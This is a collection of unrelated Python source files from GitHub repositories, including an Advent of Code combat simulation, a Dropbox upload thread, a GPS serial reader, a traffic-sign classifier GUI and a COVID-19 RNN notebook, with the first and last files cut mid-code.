in_range_points.append(next_point)\n if in_range_points and 
starting_coordinate in in_range_points:\n in_range_enemies.append((end_coordinate, target))\n if in_range_enemies:\n unit.is_attacking = True\n else:\n unit.is_attacking = False\n\n travel_distances.clear()\n rr = None\n if not unit.is_attacking:\n for end_coordinate, elf in targets.items():\n in_range_poins = []\n for direction in directions:\n next_point = tuple(\n sum(x) for x in zip(end_coordinate, direction)\n )\n if next_point in area and area[next_point].type == OPEN_CAVERN:\n in_range_poins.append(next_point)\n if in_range_poins and starting_coordinate not in in_range_poins:\n for in_range_point in in_range_poins:\n for direction in directions:\n visited_points.clear()\n seen.clear()\n next_dir = tuple(\n sum(x) for x in zip(starting_coordinate, direction)\n )\n if (\n next_dir in area\n and area[next_dir].type == OPEN_CAVERN\n ):\n visited_points.add(starting_coordinate)\n visited_points.add(next_dir)\n #print(starting_coordinate, next_dir, in_range_point, area[in_range_point])\n found = walk(next_dir, in_range_point, area)\n if found:\n travel_distances[\n (next_dir, in_range_point)\n ] = len(visited_points) - 1\n if travel_distances:\n min_distance = min(travel_distances.values())\n possible_distances = {\n coordinates: distance\n for coordinates, distance in travel_distances.items()\n if distance == min_distance\n }\n new_point = sorted(\n possible_distances.items(),\n key=lambda item: (item[0][0][1], item[0][0][0]),\n )[0][0][0]\n if (new_point, starting_coordinate) not in new_places:\n if min_distance == 1:\n unit.frozen = True\n new_places[(new_point, starting_coordinate)] = unit\n\n for places, unit in new_places.items():\n rr = places[0]\n units[places[0]] = unit\n del units[starting_coordinate]\n area[places[0]] = Area(type=unit.name)\n if area[starting_coordinate].type != unit.name:\n area[starting_coordinate] = Area(type=OPEN_CAVERN)\n if isinstance(unit, Goblin):\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Elf) and unit2.hit_points > 0\n }\n else:\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Goblin) and unit2.hit_points > 0\n }\n in_range_enemies = []\n ee = starting_coordinate\n if rr:\n ee = rr\n for end_coordinate, target in targets.items():\n in_range_points = []\n for direction in directions:\n next_point = tuple(sum(x) for x in zip(end_coordinate, direction))\n if next_point in area:\n in_range_points.append(next_point)\n if in_range_points and ee in in_range_points:\n in_range_enemies.append((end_coordinate, target))\n if in_range_enemies:\n lowest_hit_point = min(e.hit_points for c, e in in_range_enemies)\n in_range_enemies = [\n (c, e)\n for c, e in in_range_enemies\n if e.hit_points == lowest_hit_point\n ]\n target_coordinate, enemy = sorted(\n in_range_enemies, key=lambda x: (x[0][1], x[0][0])\n )[0]\n enemy.hit_points -= 3\n if enemy.hit_points < 0:\n enemy.hit_points = 0\n area[target_coordinate] = Area(type=OPEN_CAVERN)\n units = {\n starting_coordinate: unit\n for starting_coordinate, unit in units.items()\n if unit.hit_points > 0\n }\n #if round == 2:\n # print()\n # pp.pprint(units)\n # return\n round += 1\n\n\ndef manhattan(p1, p2):\n return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\nseen = set()\n\ndef walk(start: Coordinate, end: Coordinate, area: Dict[Coordinate, Area]):\n if start == end:\n return True\n new_dirs = {}\n for direction in directions:\n next_dir = tuple(sum(x) for x in zip(start, direction))\n if (\n next_dir in area\n and 
area[next_dir].type != WALL\n and next_dir not in visited_points and next_dir not in seen\n ):\n new_dirs[next_dir] = manhattan(next_dir, end)\n if not new_dirs:\n seen.add(start)\n #visited_points.remove(start)\n return False\n new_dirs = dict(sorted(new_dirs.items(), key=lambda item: item[1]))\n for next_dir in new_dirs.keys():\n visited_points.add(next_dir)\n found = walk(next_dir, end, area)\n if found:\n return True\n else:\n seen.add(next_dir)\n #visited_points.remove(next_dir)\n return False\n\n\ndef scan_area() -> Tuple:\n area = {}\n units = {}\n with open(INPUT_FILE, \"r\") as f_handle:\n for y, line in enumerate(f_handle):\n line = line.rstrip(\"\\n\")\n if line:\n for x, area_type in enumerate(line):\n if area_type in (\"G\", \"E\"):\n if area_type == \"G\":\n units[Coordinate(x=x, y=y)] = Goblin()\n else:\n units[Coordinate(x=x, y=y)] = Elf()\n area[Coordinate(x=x, y=y)] = Area(type=area_type)\n\n return area, units\n\n\ndef main():\n area, units = scan_area()\n #walk(start=(11,11),end=(27,18),area=area)\n start_combat(area, units)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mikeleppane/Advent_of_Code","sub_path":"2018/Day_15/solution_part1.py","file_name":"solution_part1.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3888495926","text":"# -*- coding: utf-8 -*-\n\"\"\"\nParameter factory functions\n\"\"\"\n#\n# Imports\n#\nfrom .base import ParameterMixin\n\n\n#\n# Factory functions\n#\n\ndef bound_mixin(name, checker, cls_name=None):\n \"\"\"Creates a new mixin class for bounded parameters\n\n This factory function makes creating bound mixins very simple, you only\n need to provide the `name` for the attribute on the resulting class for\n this particular boundary condition, and provide a callable `checker`\n to perform the validation. The checker call needs to look like this:\n\n .. code-block: python\n\n def checker(value, boundary):\n ...\n\n The call should return True when the value is within the boundary and False\n when it's not. 
The `checker` doesn't necessarily have to be a function,\n it just needs to be callable.\n\n Parameters\n ----------\n name : str\n Name of the property holding the bound's value.\n checker : callable\n Callable object/function to assess the boundary condition.\n cls_name : str, optional\n Name for the newly created class type (defaults to `name` +\n 'BoundMixin').\n\n Returns\n -------\n ParameterMixin\n New parameter mixin class for the bound specified.\n\n Raises\n ------\n ValueError\n If the given `checker` is not callable.\n\n \"\"\"\n if not callable(checker):\n raise ValueError(\"The checker must be callable\")\n if not cls_name:\n cls_name = '%sBoundMixin' % name.replace(' ', '')\n cls_name = cls_name[0].upper() + cls_name[1:]\n\n prop_name = name.lower().replace(' ', '_')\n var_name = '_%s' % prop_name\n\n def _w_property_get(self):\n return getattr(self, var_name)\n _w_property_get.func = '_get_%s' % prop_name\n\n def _w_property_set(self, value):\n setattr(self, var_name, value)\n _w_property_set.func = '_set_%s' % prop_name\n\n w_property = property(\n _w_property_get, _w_property_set, None, \"The %s bound\" % name\n )\n\n class _NewBoundMixin(ParameterMixin):\n\n def __init__(self, *args, **kwargs):\n setattr(self, var_name, None)\n prop_val = kwargs.pop(prop_name, None)\n\n super(_NewBoundMixin, self).__init__(*args, **kwargs)\n\n if prop_val:\n setattr(self, prop_name, prop_val)\n\n def _check_helper(self, value, raise_exceptions=True) -> bool:\n ret = super(_NewBoundMixin, self)._check_helper(\n value, raise_exceptions=raise_exceptions\n )\n return ret and checker(value, getattr(self, var_name))\n\n def _disp_props(self):\n ret = super(_NewBoundMixin, self)._disp_props()\n bnd = getattr(self, prop_name, None)\n if bnd:\n ret.append('%s=%s' % (prop_name, bnd))\n return ret\n\n return type(cls_name, (_NewBoundMixin,), {prop_name: w_property})\n","repo_name":"douglasdaly/spines","sub_path":"src/spines/parameters/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2715959957","text":"\nclass Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, arr):\n\n n = len(arr)\n pos = -1\n for i in range(n-1):\n\n if arr[i] > arr[i+1]:\n pos = i\n break\n\n if pos == -1:\n return 1\n\n if(arr[0] < arr[n-1] and arr[pos+1] < arr[0]):\n return 0\n for i in range(pos+1, n-1):\n if arr[i] > arr[i+1]:\n return 0\n\n return 1\n","repo_name":"adiwate32/DS_and_Algo","sub_path":"src/module1/advance_dsa_contest_1/Librarian_and_rotated_array.pu.py","file_name":"Librarian_and_rotated_array.pu.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74500215521","text":"def partition(x):\n con = None\n if x % 2 == 0:\n tup = (x, con)\n else:\n tup = (con, x)\n return tup\n\n\ndef partition_list(l):\n evenArr = []\n oddArr = []\n for i in l:\n if(i % 2 == 0):\n ans = partition(i)\n evenArr.append(ans)\n else:\n ans = partition(i)\n oddArr.append(ans)\n finalAns = (evenArr, oddArr)\n return finalAns\n\n\n# value = int(input(\"Please enter the integer value\\n\"))\n\n\nlist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nresults = 
partition_list(list)\n\nprint(results)","repo_name":"Zormelo-Alex/GlblCd-Tutorial-Sesh","sub_path":"Intro/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33050105353","text":"#!/usr/bin/python3\nimport serial\nimport time\nimport sys\n\ndef sendCommand(command):\n\tglobal ser\n\tprint(\"COMMAND:\",command)\n\tser.write(command.encode())\n\tser.flushInput()\n\nser = serial.Serial(\"/dev/ttyUSB0\",115200)\n\nW_buff = [\"AT+CGNSPWR=1\\r\\n\", \"AT+CGNSSEQ=\\\"RMC\\\"\\r\\n\", \"AT+CGNSINF\\r\\n\", \"AT+CGNSURC=2\\r\\n\",\"AT+CGNSTST=1\\r\\n\"]\n\npowerOn = \"AT+CGNSPWR=1\\r\\n\"\nbaudRate = \"AT+CGNSIPR?\\r\\n\"\nnavigation = \"AT+CGNSINF\\r\\n\"\nstatus = \"AT+CGNSTST=1\\r\\n\"\n\nsendCommand(powerOn)\ndata = \"\"\n\nbufferedBytes = 0\nwhile True:\n\tbufferedBytes = ser.inWaiting()\n\tprint(\"bytes to be read: \", bufferedBytes)\n\ttime.sleep(0.2)\n\tif bufferedBytes >1: break\ndata += ser.read(ser.inWaiting()).decode()\nprint(data)\n\n\nprint(\"next command:\", baudRate)\ntime.sleep(3)\ndata =\"\"\nsendCommand(baudRate)\nwhile True:\n\tprint(ser.inWaiting())\n\twhile ser.inWaiting() > 0:\n\t\tdata += ser.read(ser.inWaiting()).decode()\n\tif len(data) > 1:\n\t\tprint(\"Response:\", data)\n\t\tbreak\n\ttime.sleep(1)\n\n\nprint(\"next command:\", navigation)\ntime.sleep(1)\ndata =\"\"\nsendCommand(navigation)\nwhile True:\n\tprint(ser.inWaiting())\n\twhile ser.inWaiting() > 0:\n\t\tdata += ser.read(ser.inWaiting()).decode()\n\tif len(data) > 1:\n\t\tprint(\"Response:\\n------------------\\n\", data, \"\\n----------------\")\n\t\tbreak\n\ttime.sleep(1)\n\n\n\ndef toTimeString(timeRMC):\n\ttimeString = \"\"\n\thours = int(timeRMC/10000)\n\tminutes = int((timeRMC - hours*10000)/100)\n\tseconds = int(timeRMC - minutes*100 - hours*10000)\n\ttimeString+= \"%02d:%02d:%02dUT\"%(hours, minutes, seconds)\n\treturn timeString\n\t\ndef toDecimal(latlonRMC):\n\tdegrees = int(latlonRMC/100)\n\tminutes = latlonRMC - degrees*100\n\tdecimal = minutes/60\n\tdegrees = degrees + decimal\n\treturn \"%5f\"%degrees\n\t\ndef toDateString(dateRMC):\n\tday = dateRMC[2:4]\n\tmonth = dateRMC[0:2]\n\tyear = \"20\" + dateRMC[4:6]\n\treturn \"%s-%s-%s\"%(year, month, day)\n\nprint(\"next command\")\ntime.sleep(1)\ndata =\"\"\nsendCommand(status)\n\ntry:\n\twhile True:\n\t\twhile ser.inWaiting() > 0:\n\t\t\tdata += ser.read(ser.inWaiting()).decode()\n\t\tif len(data) > 1:\n\t\t\t# print(\"len:\", len(data))\n\t\t\t# print(\"Response:\", data)\n\t\t\tlines = data.split('\\n')\n\t\t\tRMClines = []\n\t\t\tfor line in lines:\n\t\t\t\tfields = line.split(',')\n\t\t\t\tif fields[0] == \"$GNRMC\": RMClines.append(line)\n\t\t\t\n\t\t\tfields = RMClines[-1].split(',')\n\t\t\tif len(fields) < 10:\n\t\t\t\tfields = RMClines[-2].split(',')\n\t\t\t\n\t\t\ttry:\n\t\t\t\tstatus = fields[2]\n\t\t\t\tif (status=='V'): print (\"no GPS fix\")\n\t\t\t\telse: \n\t\t\t\t\tlatitude = float(fields[3])\n\t\t\t\t\tlatCardinal = fields[4]\n\t\t\t\t\tlongitude = float(fields[5])\n\t\t\t\t\tlonCardinal = fields[6]\n\t\t\t\t\ttimeRMC = float(fields[1])\n\t\t\t\t\tdateRMC = fields[9]\n\t\t\t\t\tprint(toDateString(dateRMC), toTimeString(timeRMC), toDecimal(latitude) + latCardinal, toDecimal(longitude)+ lonCardinal)\n\t\t\texcept:\n\t\t\t\t\tprint(\"...waiting...\")\n\t\t\tdata =\"\"\n\t\ttime.sleep(10)\n\nexcept KeyboardInterrupt:\n\tif ser != None:\n\t\tprint(\"Clearing serial 
bus.\")\n\t\tser.close()\n\t\tsys.exit()\n","repo_name":"rashley2712/meteopi","sub_path":"gps2.py","file_name":"gps2.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5476728348","text":"# -*- coding: utf-8 -*-\n\n# Learn more: https://github.com/kennethreitz/setup.py\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.rst') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='src',\n version='1.0',\n description='Source code for my project',\n long_description=readme,\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Anomaly Detection :: Machine Learning',\n ],\n author='Tzu-Hua Kao',\n author_email='tzu-hua.kao@campus.tu-berlin.de',\n url='https://github.com/KaoCircle/anomalyDetection',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')), # same as name\n # install_requires=['bar', 'greek'], #external packages as dependencies\n # scripts=[\n # 'scripts/cool',\n # 'scripts/skype',\n # ]\n # ref:https://stackoverflow.com/questions/1471994/what-is-setup-py\n)\n","repo_name":"KaoCircle/anomalyDetection","sub_path":"project/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13976490949","text":"f = open('fruits.txt')\nfruits_raw = f.readlines()\n\nfruits = []\nfor row in fruits_raw:\n fruits += [row.strip()]\n\nf.close() #Windows can't do stuff with your file as long as Python has it open.\n\n\n'''\nWhen you use this simple method, the rows will contain '\\n' characters, \nwhich are line breaks.\nYou can get rid of those and other white spaces at the start and end of \nlines using the string.strip() method. The following code loops through your \nraw list and strips the white space out of each row. \n\nIn your Python window, look at the items from fruits by indexing them.\nFor example, fruits[0] or fruits[3:5]\n\nNow you can easily loop through the fruits, or select a random fruit.\n\nIf you want to add or remove fruits from the list, just edit the text file, \nand the code will still work. 
This makes it easy to change your data.\n'''\n\n","repo_name":"weardo98/Github","sub_path":"python_file_input/file_open_example.py","file_name":"file_open_example.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11728977058","text":"import torch\nfrom torch.autograd import Variable\nfrom utils import *\nfrom os.path import join\nimport math\nimport numpy as np\n\n\ndef test(args, model, test_loader, epoch):\n \"\"\"\n In this function:\n 1) load dataset\n 2) Run model\n 3) Print results\n \"\"\"\n\n \"\"\" Dataset \"\"\"\n model.eval()\n volatile = True\n\n \"\"\" Batch Iteration \"\"\"\n for batch_idx, (image, target) in enumerate(test_loader):\n\n \"\"\" Data \"\"\"\n if args.is_cuda:\n image = image.cuda()\n\n \"\"\" Run Model and Get Loss \"\"\"\n hologram, output = model(image)\n hologram = torch.squeeze(hologram)\n hologram = hologram.cpu().detach().numpy()\n output = torch.squeeze(output)\n output = output.cpu().detach().numpy()\n\n \"\"\" print images \"\"\"\n for i in range(len(test_loader.dataset)):\n holo = hologram[i]\n h2i = abs(np.fft.fft2(np.exp(1j * holo * 2 * math.pi)))\n\n save_holo_path = join(args.save_image_path, str(i+1)+'_holo_'+str(epoch+1)+'.png')\n save_recon_path = join(args.save_image_path, str(i+1)+'_recon_'+str(epoch+1)+'.png')\n save_output_path = join(args.save_image_path, str(i+1)+'_output_'+str(epoch+1)+'.png')\n\n imwrite(h2i, save_recon_path)\n imwrite(holo, save_holo_path)\n imwrite(output[i], save_output_path)\n","repo_name":"wonjongRyu/benchmark","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70267829601","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport numpy\nfrom numpy import array\n\nfrom keras.models import load_model\nmodel = load_model('traffic_classifier.h5')\n\nclasses = { 1:'Hız Limiti (20km/h)',\n 2:'Hız Limiti (30km/h)',\n 3:'Hız Limiti (50km/h)',\n 4:'Hız Limiti (60km/h)',\n 5:'Hız Limiti (70km/h)',\n 6:'Hız Limiti (80km/h)',\n 7:'Hız Limiti Bitti (80km/h)',\n 8:'Hız Limiti (100km/h)',\n 9:'Hız Limiti (120km/h)',\n 10:'Geçiş yok',\n 11:'3.5 ton üzerindeki araçlara geçiş yok',\n 12:'Kavşakta geçiş hakkı',\n 13:'Öncelikli yol',\n 14:'Yol ver',\n 15:'Dur',\n 16:'Araç giremez',\n 17:'3.5 ton üzerindeki araçlara yasak',\n 18:'Girilmez',\n 19:'Dikkat',\n 20:'Sola tehlikeli viraj',\n 21:'Sağa tehlikeli viraj',\n 22:'İki yönlü viraj',\n 23:'Engebeli yol',\n 24:'Kaygan yol',\n 25:'Sağda yol daralıyor',\n 26:'Yol çalışması',\n 27:'Trafik ışığı',\n 28:'Yaya geçidi',\n 29:'Çocuk geçidi',\n 30:'Bisiklet geçidi',\n 31:'Buzlanma olabilir dikkat et',\n 32:'Vahşi hayvan geçebilir',\n 33:'Geçiş limitleri',\n 34:'Sağa dönün',\n 35:'Sola dönün',\n 36:'Sadece düz gidin',\n 37:'Düz veya sağa git',\n 38:'Düz veya sola git',\n 39:'Sağda kal',\n 40:'Solda kal',\n 41:'Mecburi döner kavşak',\n 42:'Geçiş yasağı bitti',\n 43:'3.5 ton üzerindeki araçlara yasak bitti' }\n\ntop=tk.Tk()\ntop.geometry('800x600')\ntop.title('Trafik İşaretleri Sınıflandırma')\ntop.configure(background='#CDCDCD')\nlabel=Label(top,background='#CDCDCD', font=('arial',15,'bold'))\nsign_image = Label(top)\ndef classify(file_path):\n global label_packed\n image = Image.open(file_path)\n image = image.resize((30,30))\n image = numpy.expand_dims(image, axis=0)\n image = 
numpy.array(image)\n predict = model.predict([image])[0]\n en_buyuk = predict[0]\n en_buyuk_indis = 0\n for i in range(len(predict)):\n if en_buyuk<predict[i]:\n en_buyuk=predict[i]\n en_buyuk_indis = i\n sign = classes[en_buyuk_indis+1]\n print(sign)\n label.configure(foreground='#011638', text=sign)\ndef show_classify_button(file_path):\n print(file_path)\n classify_b=Button(top,text=\"Test Et\",command=lambda: classify(file_path),padx=10,pady=5)\n classify_b.configure(background='#364156', foreground='white',font=('arial',10,'bold'))\n classify_b.place(relx=0.79,rely=0.46)\ndef upload_image():\n try:\n file_path=filedialog.askopenfilename()\n uploaded=Image.open(file_path)\n uploaded.thumbnail(((top.winfo_width()/2.25),(top.winfo_height()/2.25)))\n im=ImageTk.PhotoImage(uploaded)\n sign_image.configure(image=im)\n sign_image.image=im\n label.configure(text='')\n show_classify_button(file_path)\n except:\n pass\nupload=Button(top,text=\"Görsel Seç\",command=upload_image,padx=10,pady=5)\nupload.configure(background='#364156', foreground='white',font=('arial',10,'bold'))\nupload.pack(side=BOTTOM,pady=50)\nsign_image.pack(side=BOTTOM,expand=True)\nlabel.pack(side=BOTTOM,expand=True)\nheading = Label(top, text=\"Trafik İşaretini Kontrol Et\",pady=20, font=('arial',20,'bold'))\nheading.configure(background='#CDCDCD',foreground='#364156')\nheading.pack()\ntop.mainloop()","repo_name":"alperragib/VehicleSignRecognitionCNN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"705830561","text":"import os\nfrom glob import glob as gl\nfrom threading import Thread\n\nimport dropbox\nfrom tqdm import tqdm\n\n\nclass SendThread(Thread):\n\n def __init__(self, token: str, path: str, glob: str):\n Thread.__init__(self)\n self.__dbx = dropbox.Dropbox(token)\n self.__path = path\n self.__glob = glob\n\n def run(self) -> None:\n client = self.__dbx.users_get_current_account()\n file_paths = gl(os.path.join(self.__path, self.__glob))\n\n n = 5\n for i in tqdm(range(n)):\n with open(file_paths[i], 'rb') as f:\n self.__dbx.files_upload(f.read(), f'/{os.path.basename(file_paths[i])}', autorename=True)\n","repo_name":"Tesseract98/Save-Files-To-Cloud","sub_path":"Python/threads/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29590504361","text":"import os\nfrom PIL import Image\n\n# Set the path of the folder containing the images\npath = r'D:\\New Volume E\\CAREER\\Development\\v2pdf\\dissimilar_images'\n\n\n\n# Set the filename of the output PDF\noutput_filename = \"output.pdf\"\n\n# Create a new PDF\npdf = Image.new(\"RGB\", (1, 1), \"white\")\n\n# Iterate over all images in the folder\nfor filename in os.listdir(path):\n try:\n # Load the current image\n image = Image.open(os.path.join(path, filename))\n\n # Add the image to the PDF\n if image.mode != \"RGB\":\n image = image.convert(\"RGB\")\n pdf = Image.new(\"RGB\", (max(pdf.size[0], image.size[0]), pdf.size[1] + image.size[1]), \"white\")\n pdf.paste(pdf, (0, 0))\n pdf.paste(image, (0, pdf.size[1] - image.size[1]))\n except Exception as e:\n print(f\"Error processing file {filename}: {e}\")\n\n# Save the PDF\npdf.save(output_filename, \"PDF\", 
resolution=100.0)\n","repo_name":"RahulNegi123/video_2_PDF","sub_path":"dissimilar_frames_to_pdf.py","file_name":"dissimilar_frames_to_pdf.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22847352237","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[405]:\n\n\nimport torch\nfrom torch import nn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nfrom sklearn.preprocessing import LabelEncoder\n\n\n# # draw the coefficient scale\n\n# In[406]:\n\n\ndf = pd.read_csv('covid_19.csv')\n\ndf_num = df.drop(['Country/Region', 'Lat', 'Long'], axis=1)\ndf_num = df_num.drop(index=[0])\ndf_arr = df_num.to_numpy()\n\n# change df to array to compute coefficient\nfor i in range(len(df_num)):\n    for j in range(df_num.shape[1]):\n        df_arr[i][j] = float(df_arr[i][j])\n\ndf_float = df_arr.astype(float)\n\n# difference sequence\n\ndiff = np.zeros((185,82))\nfor i in range(df_float.shape[0]):\n    for j in range(df_float.shape[1]-1):\n        diff[i][j] = df_float[i][j+1] - df_float[i][j]\n\ndiff = np.delete(diff, -1, axis=1)\n\n\ncoef_pairs = []\nfor x in range(diff.shape[0]-1):\n    for y in range(x+1, diff.shape[0]):\n        coef = np.corrcoef(diff[x], diff[y], rowvar=True)\n        coef_pairs.append(coef[1][0])\n\n\n#change list to df for coloring\ncoef_to_df = []\ncoef_to_df_each = []\nj = 0\nnext_start = 0\nfor i in range(df_float.shape[0]-1):\n    for j in range(df_float.shape[0]-1-i):\n        coef_to_df_each.append(coef_pairs[next_start + j])\n#     print(j)\n    coef_to_df.append(coef_to_df_each)\n    next_start = next_start + len(coef_to_df_each)\n    coef_to_df_each = []\n\n# filling zeros in the upper triangle \nzero = [0]*185\ncoef_to_df.append(zero)\n\n\ndataframe_list = []\nfor i in range(185):\n#     print(i)\n    temp_list = []\n    for k in range(i+1):\n        temp_list.append(0)\n    if i != 184:\n        for x in coef_to_df[i]:\n            temp_list.append(x)\n    dataframe_list.append(temp_list)\n\nd = pd.DataFrame(np.zeros((185, 185)))\nfor i in range(185):\n    d[i]=dataframe_list[i]\n    \n# s will be the colored coefficient \ncm = sns.light_palette(\"green\", as_cmap=True)\ns = d.style.background_gradient(cmap=cm)\n\n\n# # assign train, test data into loader\n\n# In[407]:\n\n\nC = set()\nfor i in range(185):\n    for j in range(185):\n        if d.iloc[i,j]>0.8:\n            C.add(i)\n            C.add(j)\n            \nx_data = []\ny_data = []\nstart_index = 0\n# L = interval\nL = 30\nfor x in (C):\n    country_data = list(df_num.iloc[x:x+1,0:].values[0]) \n#     print(country_data)\n    for i in range(0,df_num.shape[1]-L):\n        x_data.append(country_data[i:i+L])\n        if country_data[i+L]-country_data[i+L-1]:\n            y_data.append(1)\n        else:\n            y_data.append(0)\n\n\n# In[408]:\n\n\nx_data\n\n\n# In[409]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(\n    x_data, y_data, test_size=0.33, random_state=42)\n\n\n# ### Run only L=20 START\n\n# In[410]:\n\n\ndf_diff = pd.DataFrame(diff)\n# note: the slice width follows L (30 here), despite the \"20\" in the name\ndf_diff_last20 = df_diff.iloc[0:,-30:]\nall_last20 = []\nfor i in range(185):\n    # take row i's values; list() of a one-row DataFrame would only yield the column labels\n    all_last20.append(list(df_diff_last20.iloc[i]))\n\n\n# In[411]:\n\n\n# add data for predicting (last 20 data)\nlast_20_x_test = []\nlast_20_y_test = []\nfor x in all_last20:\n    last_20_x_test.append(x)\nfor i in range(185):\n    last_20_y_test.append(0)\n\n\n# In[412]:\n\n\nlen(last_20_y_test)\n\n\n# ### Run only L=20 START\n\n# In[413]:\n\n\n
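# Lists of lists are converted to NumPy arrays first, since torch.from_numpy()\n# in the next cell wraps an ndarray directly; dtypes are then normalized with\n# .type(torch.FloatTensor) a couple of cells further down.\nX_train = np.array(X_train) \nX_test = np.array(X_test)\ny_train = 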
np.array(y_train)\ny_test = np.array(y_test)\nlast_20_x_test = np.array(last_20_x_test)\nlast_20_y_test = np.array(last_20_y_test)\n\n\n# In[414]:\n\n\nlast_20_x_test[0]\n\n\n# In[415]:\n\n\nimport torch.utils.data as Data\n\n\nX_train = torch.from_numpy(X_train)\nX_test = torch.from_numpy(X_test)\ny_train = torch.from_numpy(y_train)\ny_test = torch.from_numpy(y_test)\nlast_20_x_test = torch.from_numpy(last_20_x_test)\nlast_20_y_test = torch.from_numpy(last_20_y_test)\n\n# y_tensor = torch.tensor(y_train, dtype=torch.long, device=device)\n\n\n\n# In[416]:\n\n\nX_train = X_train.view(-1, 1, L).type(torch.FloatTensor)\n\nX_test = X_test.view(-1, 1, L).type(torch.FloatTensor)\n\nlast_20_x_test = last_20_x_test.view(-1, 1, L).type(torch.FloatTensor)\n\n\n# In[417]:\n\n\nprint(X_train.shape, y_train.shape, X_test.shape, last_20_x_test.shape)\n\n\n# In[418]:\n\n\ntrain_dataset = Data.TensorDataset(X_train, y_train)\ntest_dataset = Data.TensorDataset(X_test, y_test)\n\ntrain_loader = Data.DataLoader(dataset = train_dataset, batch_size =128, shuffle = True, num_workers=4) \n\n\ntest_loader = Data.DataLoader(dataset = test_dataset, batch_size = 20, shuffle = False, num_workers=4,)\n\n\n# ### Run only L=20 START\n\n# In[419]:\n\n\nlast_20_test_dataset = Data.TensorDataset(last_20_x_test, last_20_y_test)\nlast_20_test_loader = Data.DataLoader(dataset = last_20_test_dataset, batch_size = 185, shuffle = False, num_workers=4,)\n\n\n# In[420]:\n\n\nlen(last_20_test_loader)\n\n\n# # building RNN, LSTM, GRU model\n\n# In[421]:\n\n\nclass RNN(nn.Module):\n def __init__(self):\n super(RNN, self).__init__()\n\n self.rnn = nn.RNN(\n input_size=L,\n hidden_size=256, # rnn hidden unit\n num_layers=1, ) # number of rnn layer\n # batch_first=True) # input & output will has batch size as 1s dimension. e.g. 
(batch, time_step, input_size)\n    \n        self.out = nn.Linear(256, 2) # (number of hidden nodes, number of outputs)\n\n    def forward(self, x):\n        # x: (batch_size, time_step, input_size)\n        # h_state: (num_layers, batch_size, hidden_size)\n        # r_out: (batch_size, time_step, hidden_size)\n        r_out, h_state = self.rnn(x, None)\n        outs = self.out(r_out.squeeze(0))\n        return outs.squeeze(1)\n    \nclass LSTM(nn.Module):\n    def __init__(self):\n        super(LSTM, self).__init__()\n        \n        self.lstm = nn.LSTM(input_size=L, hidden_size=256, num_layers=1)\n        self.output = nn.Linear(in_features=256, out_features=2)\n        \n    def forward(self, x):\n        r_out, (r_h, r_c) = self.lstm(x, None)\n        out = self.output(r_out[:, -1, :])\n        return out\n\nclass GRU(nn.Module):\n    def __init__(self):\n        super(GRU, self).__init__()\n        \n        self.gru = nn.GRU(input_size=L, hidden_size=256, num_layers=1)\n        self.output = nn.Linear(in_features=256, out_features=2)\n        \n    def forward(self, x):\n        r_out, h_state = self.gru(x, None)\n        out = self.output(r_out[:, -1, :])\n        return out\n\n\n# In[422]:\n\n\n# Assigning Hyper Parameters\n# TIME_STEP = 10 # rnn time step\n# INPUT_SIZE = 1 # rnn input size\n# LR = 0.02 # learning rate\n\nclass Model():\n    def __init__(self, net, train_data , test_data , EPOCH=20, LR=0.0001):\n        self.net = net\n        self.optimizer = torch.optim.Adam(net.parameters(), lr = LR)\n        self.criterion = nn.CrossEntropyLoss()\n        self.train_loader = train_data\n        self.test_loader = test_data\n        self.Epoch = EPOCH\n        self.LR_ = LR\n\n#         self.net = self.net.to(device)\n#         if device == 'cuda':\n# #             self.net = torch.nn.DataParallel(self.net)\n#             torch.backends.cudnn.benchmark = True\n\n    def plot_acc(self):\n\n        every_history_loss = []\n        every_history_train_acc = []\n        every_history_test_acc = []\n        every_predict = []\n        for epoch in range(self.Epoch):\n            print('======Epoch=======:', epoch)\n            train_loss, train_acc = self.train()\n            test_loss, test_acc, predict = self.test()\n\n            